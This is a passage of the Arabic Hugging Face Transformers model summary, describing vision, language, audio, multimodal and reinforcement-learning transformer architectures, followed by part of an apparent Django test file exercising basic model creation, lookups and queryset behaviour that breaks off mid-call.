استلهمت نماذج الرؤية الأخرى، مثل BeIT وViTMAE، الإلهام من هدف التدريب المسبق لـ BERT. يتم تدريب [BeIT](model_doc/beit) مسبقًا من خلال *نمذجة الصور المقنعة (MIM)*؛ يتم إخفاء رقّعات الصور بشكل عشوائي، كما يتم تحويل الصورة إلى رموز بصرية. يتم تدريب BeIT للتنبؤ بالرموز البصرية المُناظرة للرقع المخفية. لدى [ViTMAE](model_doc/vitmae) هدف تدريب مسبق مُماثل، باستثناء أنه يجب عليه التنبؤ بالبكسلات بدلاً من الرموز البصرية. ما هو غير عادي هو أن إخفاء 75% من رقع الصور! يقوم فك التشفير بإعادة بناء البكسلات من الرموز المخفية والرقّعات المشفرة. بعد التدريب المسبق، يتم التخلص من فك التشفير، ويصبح الترميز جاهزًا للاستخدام في مهام التالية.
### فك التشفير[[cv-decoder]] (Decoder)
نادرًا ما تستخدم نماذج الرؤية التي تعتمد على فك التشفير فقط لأن معظم نماذج الرؤية تعتمد على الترميز لتعلم تمثيل الصورة. ولكن بالنسبة للاستخدامات مثل توليد الصور، يعد فك التشفير مناسبًا بشكل طبيعي، كما رأينا من نماذج توليد النصوص مثل GPT-2. يستخدم نموذج [ImageGPT](model_doc/imagegpt) نفس بنية GPT-2، ولكنه بدلاً من التنبؤ بالرمز التالي في تسلسل، فإنه يتنبأ بالبكسل التالي في صورة. بالإضافة إلى توليد الصور، يمكن أيضًا ضبط ImageGPT بدقة لتصنيف الصور.
### الترميز وفك التشفير[[cv-encoder-decoder]] (Encoder-decoder)
تستخدم نماذج الرؤية بشكل شائع ترميزًا (يُعرف أيضًا باسم العمود الفقري) لاستخراج ميزات الصورة المهمة قبل تمريرها إلى فك التشفير لنموذج المُحوّل. يستخدم [DETR](model_doc/detr) عمودًا فقريًا مُدربًا مسبقًا، ولكنه يستخدم أيضًا الببنية الكاملة للترميز وفك تشفير لنموذج المحول للكشف عن الأشياء. يتعلم الترميز تمثيلات الصور ويجمعها مع استعلامات الكائنات (كل استعلام كائن هو تضمين مُتعلم يركز على منطقة أو كائن في صورة) في فك التشفير. يتنبأ DETR بإحداثيات مربع الحدود وتسمية الفئة لكل استعلام كائن.
## معالجة اللغات الطبيعية (Natural language processing - NLP)
<iframe style="border: 1px solid rgba(0, 0, 0, 0.1);" width="1000" height="450" src="https://www.figma.com/embed?embed_host=share&url=https%3A%2F%2Fwww.figma.com%2Ffile%2FUhbQAZDlpYW5XEpdFy6GoG%2Fnlp-model-timeline%3Fnode-id%3D0%253A1%26t%3D4mZMr4r1vDEYGJ50-1" allowfullscreen></iframe>
### الترميز اللغوي[[nlp-encoder]]
نموذج [BERT](model_doc/bert) هو محوّل (Transformer) يعتمد على الترميز فقط يقوم بشكل عشوائي بإخفاء رموز معينة في المدخلات لتجنب رؤية باقى الرموز الأخرى، مما يسمح له "بالغش". يتمثل هدف التدريب المسبق في التنبؤ بالرمز المخفي بناءً على السياق. يسمح هذا لـ BERT باستخدام السياقات اليمنى واليسرى بالكامل لمساعدته في تعلم تمثيل أعمق وأغنى للبيانات المدخلة. ومع ذلك، كان هناك مجال للتحسين في استراتيجية التدريب المسبق لـ BERT. نموذج [RoBERTa](model_doc/roberta) اضاف تحسين من خلال تقديم وصفة تدريب مسبق جديدة تشمل التدريب لفترة أطول وعلى دفعات أكبر، وإخفاء الرموز عشوائيًا في كل حقبة بدلاً من مرة واحدة فقط أثناء المعالجة المسبقة، وإزالة هدف التنبؤ بالجملة التالية.
تتمثل الاستراتيجية السائدة لتحسين الأداء في زيادة حجم النموذج. ولكن تدريب النماذج الكبيرة مكلف من الناحية الحسابية. إحدى طرق تقليل التكاليف الحسابية هي استخدام نموذج أصغر مثل [DistilBERT](model_doc/distilbert). يستخدم DistilBERT [ تقنية تقطير المعرفة](https://huggingface.co/papers/1503.02531) - وهي تقنية ضغط - لإنشاء نموذج أصغر من BERT مع الحفاظ على معظم قدراته على فهم اللغةا.
مرت معظم نماذج المحول في الاتجاه نحو المزيد من المعلمات، مما أدى إلى ظهور نماذج جديدة تركز على تحسين كفاءة التدريب. يقلّل [ALBERT](model_doc/albert) من استهلاك الذاكرة عن طريق تقليل عدد المعلمات بطريقتين: فصل تضمين المفردات الأكبر إلى مصفوفتين أصغر والسماح للمستويات بمشاركة المعلمات. أضاف [DeBERTa](model_doc/deberta) آلية انتباه منفصلة حيث يتم ترميز الكلمة وموضعها بشكل منفصل في متجهين. يتم حساب الانتباه من هذه المتجهات المنفصلة بدلاً من متجه واحد يحتوي على تضمين الكلمة والموقع. ركز [Longformer](model_doc/longformer) أيضًا على جعل الانتباه أكثر كفاءة، خاصة لمعالجة المستندات ذات تسلسلات أطولل. فهو يستخدم مزيجًا من انتباه النوافذ المحلية (يتم حساب الانتباه فقط ن نافذة ذات حجم ثابت حول كل رمز) والانتباه العام (فقط لرموز مهمة محددة مثل `[CLS]` للتصنيف) لإنشاء مصفوفة انتباه متفرقة بدلاً من مصفوفة انتباه كاملة.
### فك التشفير[[nlp-decoder]]
نموذج [GPT-2](model_doc/gpt2) هو محول فك تشفير فقط يتنبأ بالكلمة التالية في التسلسل. إنه يخفي الرموز التالية الموجودة على اليمين حتى لا يتمكن النموذج من "الغش" بالنظر إليها. من خلال التدريب المسبق على كميات هائلة من النصوص، أصبح [GPT-2](model_doc/gpt2) بارعًا في توليد النصوص، حتى لو لم تكن النص دقيقًا أو صحيحًا في بعض الأحيان فقط. ولكن كان يفتقر إلى سياق لترابط المتبادل (bidirectional context) الموجود من التدريب المسبق لـ [BERT](model_doc/bert) ، مما جعله غير مناسب لمهام معينة. يجمع [XLNET](model_doc/xlnet) بين أفضل ما في أهداف التدريب المسبق لـ [BERT](model_doc/bert) و [GPT-2](model_doc/gpt2) من خلال اعتماد نهج النمذجة اللغوية باستخدام التباديل (Permutation Language Modeling - PLM) الذي يسمح له بتعلم الترابط ثنائي الاتجاه.
بعد ظهور [GPT-2](model_doc/gpt2)، تطورت النماذج اللغوية بشكل أكبر حجمًا وأكثر تعقيدًا وأصبحت تُعرف الآن باسم *نماذج اللغة الكبيرة (LLMs)*. توضح LLMs مهارات تعلم قليلة الكمية أو حتى معدومة إذا تم تدريبها على مجموعة بيانات كبيرة بما يكفي. [GPT-J](model_doc/gptj) هو LLM به 6 مليارات معلمة مدربة على 400 مليار رمز. تبعه نموذج [OPT](model_doc/opt)، وهي عائلة من نماذج فك التشفير فقط، أكبرها 175 مليار معلمة ودُرب على 180 مليار رمز. تم إصدار [BLOOM](model_doc/bloom) في نفس الوقت تقريبًا، ويحتوي أكبر نموذج في العائلة على 176 مليار معلمة ودُرب على 366 مليار رمز في 46 لغة و13 لغة برمجة.
### الترميز وفك التشفير[[nlp-encoder-decoder]]
يحتفظ [BART](model_doc/bart) ببنية المحول الأصلية، ولكنه يعدّل هدف التدريب المسبق باستخدام إفساد *إدخال النصوص*، حيث يتم استبدال بعض نطاقات النص برمز `mask` واحد. يتنبأ فك التشفير بالرموز غير الفاسدة (يتم إخفاء الرموز المستقبلية) ويستخدم حالات الترميز المخفية للمساعدة. [Pegasus](model_doc/pegasus) مشابه لـ BART، ولكن Pegasus يقوم بإخفاء جمل كاملة بدلاً من مقاطع النص. بالإضافة إلى نمذجة اللغة المقنعة، يتم تدريب Pegasus مسبقًا بواسطة توليد الجمل الفارغة (GSG). يقوم هدف GSG بإخفاء الجمل الكاملة المهمة للمستند، واستبدالها برمز `mask`. يجب على فك التشفير توليد المخرجات من الجمل المتبقية. [T5](model_doc/t5) هو نموذج فريد من نوعه يحوّل جميع مهام معالجة اللغة الطبيعية إلى مشكلة نص إلى نص باستخدام بادئات محددة. على سبيل المثال، يشير البادئة `Summarize:` إلى مهمة تلخيص. يتم تدريب T5 مسبقًا بواسطة التدريب الخاضع للإشراف (GLUE وSuperGLUE) والتدريب ذاتي الإشراف (اختيار عينة عشوائية وحذف 15% من الرموز).
## الصوت (Audio)
<iframe style="border: 1px solid rgba(0, 0, 0, 0.1);" width="1000" height="450" src="https://www.figma.com/embed?embed_host=share&url=https%3A%2F%2Fwww.figma.com%2Ffile%2Fvrchl8jDV9YwNVPWu2W0kK%2Fspeech-and-audio-model-timeline%3Fnode-id%3D0%253A1%26t%3DmM4H8pPMuK23rClL-1" allowfullscreen></iframe>
### الترميز[[audio-encoder]]
يستخدم [Wav2Vec2](model_doc/wav2vec2) ترميز من نوع المحوّل لتعلم تمثيلات الكلام بشكلٍ مباشر من موجات الصوت الخام. يتم تدريبه مسبقًا باستخدام مهمة تباينية لتحديد تمثيل الكلام الصحيح من مجموعة من التمثيلات الخاطئة. [HuBERT](model_doc/hubert) مشابه لـ Wav2Vec2 ولكنه له عملية تدريب مختلفة. يتم إنشاء تسميات الهدف عن طريق خطوة تجميع يتم فيها ت تخصيص مقاطع الصوت المتشابهة إلى مجموعات، تُصبح كل واحدة منها وحدةً خفية. ويتم تعيين الوحدة الخفية إلى تمثيل لإجراء تنبؤ.
### الترميز وفك التشفير[[audio-encoder-decoder]]
[Speech2Text](model_doc/speech_to_text) هو نموذج كلام مصمم للتعرف التلقائي على الكلام (ASR) وترجمة الكلام. يقبل النموذج ميزات بنك المرشح اللغوي التي تم استخراجها من شكل موجة الصوت وتم تدريبه مسبقًا بطريقة ذاتية التعلم لتوليد نسخة أو ترجمة. [Whisper](model_doc/whisper) هو أيضًا نموذج ASR، ولكنه على عكس العديد من نماذج الكلام الأخرى، يتم تدريبه مسبقًا على كمية كبيرة من بيانات نسخ النص الصوتي ✨ المسماة ✨ لتحقيق الأداء الصفري. يحتوي جزء كبير من مجموعة البيانات أيضًا على لغات غير اللغة الإنجليزية، مما يعني أنه يمكن استخدام Whisper أيضًا للغات منخفضة الموارد. من الناحية الهيكلية، يشبه Whisper نموذج Speech2Text. يتم تحويل إشارة الصوت إلى طيف لوجاريتم مل-ميل يتم تشفيره بواسطة الترميز. يقوم فك التشفير بتوليد النسخة بطريقة ذاتية التعلم من حالات الترميز المخفية والرموز السابقة.
## متعدد الوسائط (Multimodal)
<iframe style="border: 1px solid rgba(0, 0, 0, 0.1);" width="1000" height="450" src="https://www.figma.com/embed?embed_host=share&url=https%3A%2F%2Fwww.figma.com%2Ffile%2FcX125FQHXJS2gxeICiY93p%2Fmultimodal%3Fnode-id%3D0%253A1%26t%3DhPQwdx3HFPWJWnVf-1" allowfullscreen></iframe>
### Encoder[[mm-encoder]]
نموذج [VisualBERT](model_doc/visual_bert) هو نموذج متعدد الوسائط لمهام الرؤية اللغوية تم إصداره بعد فترة وجيزة من BERT. فهو يجمع بين BERT ونظام اكتشاف كائن مسبق التدريب لاستخراج ميزات الصورة في تضمينات بصرية، يتم تمريرها جنبًا إلى جنب مع التضمينات النصية إلى BERT. يتنبأ VisualBERT بالنص المقنع بناءً على النص غير المقنع والتضمينات المرئية، ويجب عليه أيضًا التنبؤ بما إذا كان النص متوافقًا مع الصورة. عندما تم إصدار ViT، اعتمد [ViLT](model_doc/vilt) ViT في بنيتها لأنه كان من الأسهل الحصول على تضمينات الصورة بهذه الطريقة. يتم معالجة تضمينات الصورة بشكل مشترك مع التضمينات النصية. ومن هناك، يتم التدريب المسبق لـ ViLT بواسطة مطابقة الصورة النصية، ونمذجة اللغة المقنعة، وإخفاء كلمة كاملة.
يتّبع [CLIP](model_doc/clip) نهجًا مختلفًا ويقوم بتنبؤ ثنائي من ("الصورة"، "النص"). يتم تدريب مشفر صورة (ViT) ومشفر نص (Transformer) بشكل مشترك على مجموعة بيانات مكونة من 400 مليون ثنائي من ("صورة"، "نص") لتعظيم التشابه بين متجهات ترميز الصورة ومتجهات النص ثنائي ("الصورة"، "النص"). بعد التدريب المسبق، يمكنك استخدام اللغة الطبيعية لتوجيه CLIP للتنبؤ بالنص المُعطى بناءً على صورة أو العكس بالعكس. [OWL-ViT](model_doc/owlvit) يبني على CLIP باستخدامه كعمود فقري للكشف عن الكائنات بدون إشراف. بعد التدريب المسبق، يتم إضافة رأس كشف الأجسام لإجراء تنبؤ بمجموعة مُحدّد عبر ثنائيات ("class"، "bounding box").
### Encoder-decoder[[mm-encoder-decoder]]
التعرّف البصري على الحروف (OCR) مهمة قديمة لتعرّف النصوص، التي تنطوي عادةً على عدة مكونات لفهم الصورة وتوليد النص. [TrOCR](model_doc/trocr) بتبسيط العملية باستخدام محول متكامل من النهاية إلى النهاية. المشفر هو نموذج على غرار ViT لفهم الصورة ويعالج الصورة كقطع ثابتة الحجم. يقبل فك التشفير حالات الإخفاء للمشفر وينشئ النص بشكل تلقائي. [Donut](model_doc/donut) هو نموذج أكثر عمومية لفهم المستندات المرئية لا يعتمد على نهج OCR. يستخدم محول Swin كمشفر وBART متعدد اللغات كمُفكّك تشفير. يتم تدريب Donut على قراءة النص عن طريق التنبؤ بالكلمة التالية بناءً على ملاحظات الصورة والنص. يقوم فك التشفير بتوليد تتسلسلًا رمزيًا بناءً على موجه (Prompt). يتم تمثيل الموجه بواسطة رمز خاص لكل مهمة. على سبيل المثال، يحتوي تحليل المستند على رمز خاص "parsing" يتم دمجه مع حالات الإخفاء للـمُشفّر لتحليل المستند بتنسيق إخراج منظم (JSON).
## التعلم التعزيزي (Reinforcement learning - RL)
<iframe style="border: 1px solid rgba(0, 0, 0, 0.1);" width="1000" height="450" src="https://www.figma.com/embed?embed_host=share&url=https%3A%2F%2Fwww.figma.com%2Ffile%2FiB3Y6RvWYki7ZuKO6tNgZq%2Freinforcement-learning%3Fnode-id%3D0%253A1%26t%3DhPQwdx3HFPWJWnVf-1" allowfullscreen></iframe>
### فك التشفير[[rl-decoder]]
يقوم نموذج "محوّل القرارات والمسارات" (Decision and Trajectory Transformer) بتحويل الحالة (State) والإجراء (Action) والمكافأة (Reward) كمشكلة نمذجة تسلسلية. [محوّل القرارات](model_doc/decision_transformer) يقوم بتوليد سلسلة من الإجراءات التي تؤدي إلى عائد مرغوب في المستقبل بناءً على العوائد المتوقعة، والحالات والإجراءات السابقة. في الخطوات الزمنية *K* الأخيرة، يتم تحويل كل وسائط البيانات الثلاث vإلى متجهات تضمين رمزيّة ومعالجتها بواسطة نموذج مشابه لـ GPT للتنبؤ برمز الإجراء المستقبلي.يقوم [محول المسار](model_doc/trajectory_transformer) أيضًا بتحويل الحالات والإجراءات والمكافآت إلى رموز ومعالجتها باستخدام هيكلية GPT. على عكس "محوّل القرارات"، الذي يركز على تكييف المكافأة، يقوم "محوّل المسارات" بتوليد إجراءات مستقبلية باستخدام البحث الشعاعي (Beam Search). | unknown | github | https://github.com/huggingface/transformers | docs/source/ar/model_summary.md |
from __future__ import unicode_literals
import threading
import warnings
from datetime import datetime, timedelta
from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist
from django.db import DEFAULT_DB_ALIAS, DatabaseError, connections
from django.db.models.fields import Field
from django.db.models.fields.related import ForeignObjectRel
from django.db.models.manager import BaseManager
from django.db.models.query import EmptyQuerySet, QuerySet
from django.test import (
SimpleTestCase, TestCase, TransactionTestCase, skipIfDBFeature,
skipUnlessDBFeature,
)
from django.utils import six
from django.utils.translation import ugettext_lazy
from .models import Article, ArticleSelectOnSave, SelfRef
class ModelInstanceCreationTests(TestCase):
def test_object_is_not_written_to_database_until_save_was_called(self):
a = Article(
id=None,
headline='Parrot programs in Python',
pub_date=datetime(2005, 7, 28),
)
self.assertIsNone(a.id)
self.assertEqual(Article.objects.all().count(), 0)
# Save it into the database. You have to call save() explicitly.
a.save()
self.assertIsNotNone(a.id)
self.assertEqual(Article.objects.all().count(), 1)
def test_can_initialize_model_instance_using_positional_arguments(self):
"""
You can initialize a model instance using positional arguments,
which should match the field order as defined in the model.
"""
a = Article(None, 'Second article', datetime(2005, 7, 29))
a.save()
self.assertEqual(a.headline, 'Second article')
self.assertEqual(a.pub_date, datetime(2005, 7, 29, 0, 0))
def test_can_create_instance_using_kwargs(self):
a = Article(
id=None,
headline='Third article',
pub_date=datetime(2005, 7, 30),
)
a.save()
self.assertEqual(a.headline, 'Third article')
self.assertEqual(a.pub_date, datetime(2005, 7, 30, 0, 0))
def test_autofields_generate_different_values_for_each_instance(self):
a1 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
a2 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
a3 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
self.assertNotEqual(a3.id, a1.id)
self.assertNotEqual(a3.id, a2.id)
def test_can_mix_and_match_position_and_kwargs(self):
# You can also mix and match position and keyword arguments, but
# be sure not to duplicate field information.
a = Article(None, 'Fourth article', pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Fourth article')
def test_cannot_create_instance_with_invalid_kwargs(self):
six.assertRaisesRegex(
self,
TypeError,
"'foo' is an invalid keyword argument for this function",
Article,
id=None,
headline='Some headline',
pub_date=datetime(2005, 7, 31),
foo='bar',
)
def test_can_leave_off_value_for_autofield_and_it_gets_value_on_save(self):
"""
You can leave off the value for an AutoField when creating an
object, because it'll get filled in automatically when you save().
"""
a = Article(headline='Article 5', pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Article 5')
self.assertNotEqual(a.id, None)
def test_leaving_off_a_field_with_default_set_the_default_will_be_saved(self):
a = Article(pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Default headline')
def test_for_datetimefields_saves_as_much_precision_as_was_given(self):
"""as much precision in *seconds*"""
a1 = Article(
headline='Article 7',
pub_date=datetime(2005, 7, 31, 12, 30),
)
a1.save()
self.assertEqual(Article.objects.get(id__exact=a1.id).pub_date,
datetime(2005, 7, 31, 12, 30))
a2 = Article(
headline='Article 8',
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a2.save()
self.assertEqual(Article.objects.get(id__exact=a2.id).pub_date,
datetime(2005, 7, 31, 12, 30, 45))
def test_saving_an_object_again_does_not_create_a_new_object(self):
a = Article(headline='original', pub_date=datetime(2014, 5, 16))
a.save()
current_id = a.id
a.save()
self.assertEqual(a.id, current_id)
a.headline = 'Updated headline'
a.save()
self.assertEqual(a.id, current_id)
def test_querysets_checking_for_membership(self):
headlines = [
'Parrot programs in Python', 'Second article', 'Third article']
some_pub_date = datetime(2014, 5, 16, 12, 1)
for headline in headlines:
Article(headline=headline, pub_date=some_pub_date).save()
a = Article(headline='Some headline', pub_date=some_pub_date)
a.save()
# You can use 'in' to test for membership...
self.assertIn(a, Article.objects.all())
# ... but there will often be more efficient ways if that is all you need:
self.assertTrue(Article.objects.filter(id=a.id).exists())
class ModelTest(TestCase):
def test_objects_attribute_is_only_available_on_the_class_itself(self):
six.assertRaisesRegex(
self,
AttributeError,
"Manager isn't accessible via Article instances",
getattr,
Article(),
"objects",
)
self.assertFalse(hasattr(Article(), 'objects'))
self.assertTrue(hasattr(Article, 'objects'))
def test_queryset_delete_removes_all_items_in_that_queryset(self):
headlines = [
'An article', 'Article One', 'Amazing article', 'Boring article']
some_pub_date = datetime(2014, 5, 16, 12, 1)
for headline in headlines:
Article(headline=headline, pub_date=some_pub_date).save()
self.assertQuerysetEqual(Article.objects.all().order_by('headline'),
["<Article: Amazing article>",
"<Article: An article>",
"<Article: Article One>",
"<Article: Boring article>"])
Article.objects.filter(headline__startswith='A').delete()
self.assertQuerysetEqual(Article.objects.all().order_by('headline'),
["<Article: Boring article>"])
def test_not_equal_and_equal_operators_behave_as_expected_on_instances(self):
some_pub_date = datetime(2014, 5, 16, 12, 1)
a1 = Article.objects.create(headline='First', pub_date=some_pub_date)
a2 = Article.objects.create(headline='Second', pub_date=some_pub_date)
self.assertNotEqual(a1, a2)
self.assertEqual(a1, Article.objects.get(id__exact=a1.id))
self.assertNotEqual(Article.objects.get(id__exact=a1.id), Article.objects.get(id__exact=a2.id))
@skipUnlessDBFeature('supports_microsecond_precision')
def test_microsecond_precision(self):
# In PostgreSQL, microsecond-level precision is available.
a9 = Article(
headline='Article 9',
pub_date=datetime(2005, 7, 31, 12, 30, 45, 180),
)
a9.save()
self.assertEqual(Article.objects.get(pk=a9.pk).pub_date,
datetime(2005, 7, 31, 12, 30, 45, 180))
@skipIfDBFeature('supports_microsecond_precision')
def test_microsecond_precision_not_supported(self):
# In MySQL, microsecond-level precision isn't always available. You'll
# lose microsecond-level precision once the data is saved.
a9 = Article(
headline='Article 9',
pub_date=datetime(2005, 7, 31, 12, 30, 45, 180),
)
a9.save()
self.assertEqual(
Article.objects.get(id__exact=a9.id).pub_date,
datetime(2005, 7, 31, 12, 30, 45),
)
@skipIfDBFeature('supports_microsecond_precision')
def test_microsecond_precision_not_supported_edge_case(self):
# In MySQL, microsecond-level precision isn't always available. You'll
# lose microsecond-level precision once the data is saved.
a = Article.objects.create(
headline='Article',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
self.assertEqual(
Article.objects.get(pk=a.pk).pub_date,
datetime(2008, 12, 31, 23, 59, 59),
)
def test_manually_specify_primary_key(self):
# You can manually specify the primary key when creating a new object.
a101 = Article(
id=101,
headline='Article 101',
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a101.save()
a101 = Article.objects.get(pk=101)
self.assertEqual(a101.headline, 'Article 101')
def test_create_method(self):
# You can create saved objects in a single step
a10 = Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
self.assertEqual(Article.objects.get(headline="Article 10"), a10)
def test_year_lookup_edge_case(self):
# Edge-case test: A year lookup should retrieve all objects in
# the given year, including Jan. 1 and Dec. 31.
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
self.assertQuerysetEqual(Article.objects.filter(pub_date__year=2008),
["<Article: Article 11>", "<Article: Article 12>"])
def test_unicode_data(self):
# Unicode data works, too.
a = Article(
headline='\u6797\u539f \u3081\u3050\u307f',
pub_date=datetime(2005, 7, 28),
)
a.save()
self.assertEqual(Article.objects.get(pk=a.id).headline,
'\u6797\u539f \u3081\u3050\u307f')
def test_hash_function(self):
# Model instances have a hash function, so they can be used in sets
# or as dictionary keys. Two models compare as equal if their primary
# keys are equal.
a10 = Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a11 = Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
a12 = Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
s = {a10, a11, a12}
self.assertIn(Article.objects.get(headline='Article 11'), s)
def test_field_ordering(self):
"""
Field instances have a `__lt__` comparison function to define an
ordering based on their creation. Prior to #17851 this ordering
comparison relied on the now unsupported `__cmp__` and was assuming
compared objects were both Field instances raising `AttributeError`
when it should have returned `NotImplemented`.
"""
f1 = Field()
f2 = Field(auto_created=True)
f3 = Field()
self.assertLess(f2, f1)
self.assertGreater(f3, f1)
self.assertIsNotNone(f1)
self.assertNotIn(f2, (None, 1, ''))
def test_extra_method_select_argument_with_dashes_and_values(self):
# The 'select' argument to extra() supports names with dashes in
# them, as long as you use values().
Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
dicts = Article.objects.filter(
pub_date__year=2008).extra(
select={'dashed-value': '1'}).values('headline', 'dashed-value')
self.assertEqual([sorted(d.items()) for d in dicts],
[[('dashed-value', 1), ('headline', 'Article 11')], [('dashed-value', 1), ('headline', 'Article 12')]])
def test_extra_method_select_argument_with_dashes(self):
# If you use 'select' with extra() and names containing dashes on a
# query that's *not* a values() query, those extra 'select' values
# will silently be ignored.
Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
articles = Article.objects.filter(
pub_date__year=2008).extra(select={'dashed-value': '1', 'undashedvalue': '2'})
self.assertEqual(articles[0].undashedvalue, 2)
def test_create_relation_with_ugettext_lazy(self):
"""
Test that ugettext_lazy objects work when saving model instances
through various methods. Refs #10498.
"""
notlazy = 'test'
lazy = ugettext_lazy(notlazy)
Article.objects.create(headline=lazy, pub_date=datetime.now())
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
# test that assign + save works with Promise objects
article.headline = lazy
article.save()
self.assertEqual(article.headline, notlazy)
# test .update()
Article.objects.update(headline=lazy)
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
# still test bulk_create()
Article.objects.all().delete()
Article.objects.bulk_create([Article(headline=lazy, pub_date=datetime.now())])
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
def test_emptyqs(self):
# Can't be instantiated
with self.assertRaises(TypeError):
EmptyQuerySet()
self.assertIsInstance(Article.objects.none(), EmptyQuerySet)
def test_emptyqs_values(self):
# test for #15959
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
qs = Article.objects.none().values_list('pk')
self.assertIsInstance(qs, EmptyQuerySet)
self.assertEqual(len(qs), 0)
def test_emptyqs_customqs(self):
# A hacky test for custom QuerySet subclass - refs #17271
Article.objects.create(headline='foo', pub_date=datetime.now())
class CustomQuerySet(QuerySet):
def do_something(self):
return 'did something'
qs = Article.objects.all()
qs.__class__ = CustomQuerySet
qs = qs.none()
with self.assertNumQueries(0):
self.assertEqual(len(qs), 0)
self.assertIsInstance(qs, EmptyQuerySet)
self.assertEqual(qs.do_something(), 'did something')
def test_emptyqs_values_order(self):
# Tests for ticket #17712
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().values_list('id').order_by('id')), 0)
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().filter(
id__in=Article.objects.values_list('id', flat=True))), 0)
@skipUnlessDBFeature('can_distinct_on_fields')
def test_emptyqs_distinct(self):
# Tests for #19426
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().distinct('headline', 'pub_date')), 0)
def test_ticket_20278(self):
sr = SelfRef.objects.create()
with self.assertRaises(ObjectDoesNotExist):
SelfRef.objects.get(selfref=sr)
def test_eq(self):
self.assertEqual(Article(id=1), Article(id=1))
self.assertNotEqual(Article(id=1), object())
self.assertNotEqual(object(), Article(id=1))
a = Article()
self.assertEqual(a, a)
self.assertNotEqual(Article(), a)
def test_hash(self):
# Value based on PK
self.assertEqual(hash(Article(id=1)), hash(1))
with self.assertRaises(TypeError):
# No PK value -> unhashable (because save() would then change
# hash)
hash(Article())
class ModelLookupTest(TestCase):
def setUp(self):
# Create an Article.
self.a = Article(
id=None,
headline='Swallow programs in Python',
pub_date=datetime(2005, 7, 28),
)
# Save it into the database. You have to call save() explicitly.
self.a.save()
def test_all_lookup(self):
# Change values by changing the attributes, then calling save().
self.a.headline = 'Parrot programs in Python'
self.a.save()
# Article.objects.all() returns all the articles in the database.
self.assertQuerysetEqual(Article.objects.all(),
['<Article: Parrot programs in Python>'])
def test_rich_lookup(self):
# Django provides a rich database lookup API.
self.assertEqual(Article.objects.get(id__exact=self.a.id), self.a)
self.assertEqual(Article.objects.get(headline__startswith='Swallow'), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7, pub_date__day=28), self.a)
self.assertEqual(Article.objects.get(pub_date__week_day=5), self.a)
def test_equal_lookup(self):
# The "__exact" lookup type can be omitted, as a shortcut.
self.assertEqual(Article.objects.get(id=self.a.id), self.a)
self.assertEqual(Article.objects.get(headline='Swallow programs in Python'), self.a)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2005),
['<Article: Swallow programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2004),
[],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2005, pub_date__month=7),
['<Article: Swallow programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__week_day=5),
['<Article: Swallow programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__week_day=6),
[],
)
def test_does_not_exist(self):
# Django raises an Article.DoesNotExist exception for get() if the
# parameters don't match any object.
six.assertRaisesRegex(
self,
ObjectDoesNotExist,
"Article matching query does not exist.",
Article.objects.get,
id__exact=2000,
)
# To avoid dict-ordering related errors check only one lookup
# in single assert.
self.assertRaises(
ObjectDoesNotExist,
Article.objects.get,
pub_date__year=2005,
pub_date__month=8,
)
six.assertRaisesRegex(
self,
ObjectDoesNotExist,
"Article matching query does not exist.",
Article.objects.get,
pub_date__week_day=6,
)
def test_lookup_by_primary_key(self):
# Lookup by a primary key is the most common case, so Django
# provides a shortcut for primary-key exact lookups.
# The following is identical to articles.get(id=a.id).
self.assertEqual(Article.objects.get(pk=self.a.id), self.a)
# pk can be used as a shortcut for the primary key name in any query.
self.assertQuerysetEqual(Article.objects.filter(pk__in=[self.a.id]),
["<Article: Swallow programs in Python>"])
# Model instances of the same type and same ID are considered equal.
a = Article.objects.get(pk=self.a.id)
b = Article.objects.get(pk=self.a.id)
self.assertEqual(a, b)
def test_too_many(self):
# Create a very similar object
a = Article(
id=None,
headline='Swallow bites Python',
pub_date=datetime(2005, 7, 28),
)
a.save()
self.assertEqual(Article.objects.count(), 2)
# Django raises an Article.MultipleObjectsReturned exception if the
# lookup matches more than one object
six.assertRaisesRegex(
self,
MultipleObjectsReturned,
